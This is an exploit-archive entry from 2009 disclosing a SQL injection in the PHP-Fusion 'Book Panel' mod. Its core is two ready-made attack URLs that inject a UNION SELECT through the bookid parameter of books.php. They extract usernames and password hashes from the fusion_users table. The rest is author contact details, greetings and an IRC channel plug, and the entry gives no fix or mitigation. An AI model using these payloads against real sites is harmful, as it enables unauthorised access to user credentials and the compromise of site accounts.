[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability
# Published : 2009-03-09
# Author : elusiven
# Previous Title : phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities
# Next Title : Blue Eye CMS <= 1.0.0 Remote Cookie SQL Injection Vulnerability
/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ |----------------------------------------------------------------| +
+ | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability | +
+ |----------------------------------------------------------------| +
+ +
+ [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-) +
+ +
+ |--------------------------------| +
+ | Author: elusiven from Poland ! | +
+ | Contact: elusivenpl@gmail.com | +
+ | Greetings: Fusi0n Group | +
+ |--------------------------------| +
+ +
+ Exploit: +
+ +
+ http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- +
+ http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users-- +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/
/join #wyjadacze on irc.quakenet.org
# www.Syue.com [2009-03-09]